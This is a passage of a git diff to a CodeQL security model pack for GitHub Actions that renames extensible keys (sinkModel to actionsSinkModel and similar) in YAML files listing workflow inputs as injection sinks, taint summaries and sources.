diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4..9add4859f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb7..efc8097b963 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aac..6a305522cfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc..441325c76a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e..5f0831afc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba2..afd7aabc1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f..49e556f585f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038e..24585aa50ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750cc..afc7af28f9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530..5b3d91a8a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f966..b43253eb619 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2..89559cf57e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b7..6292841e56a 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e8..9f98fd51139 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209d..e04605511b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e9..a77181e6c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b90057..6c90e29a43b 100644 
--- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b1..6bacbc181da 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b41..83d438d4e3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd..703a766cb4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e04..ecb4c809efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e0..9b02577be7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f..1ffc3df1c81 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe1..53ed1840b0a 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f42..17d2ed2e473 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml 
+++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce..68c2552c350 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce52..977f6b98ae4 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b5..616f7fdb9ca 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] 
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395..e4961ae5ed6 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30e..19cce83c691 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155e..f838eeed0eb 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f..48e5b05128f 100644 
--- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 76177635899..448997b3136 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a..13af446f37d 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd1766..39e1c9ef624 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] 
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc50..a442ed5cd53 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b..a22fce01c45 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22..74a5c7d592c 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a1..e78dfb3b073 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c3..29dac5cffea 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad9..f2331633485 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc4..e492f601278 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] 
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3..a821b049232 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764f..4f9f887caf1 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7..365f3ac98f8 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] 
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a..f42e8465533 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624..e21b5224166 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c..6c4a5931b98 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd6..c7e89697afb 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml 
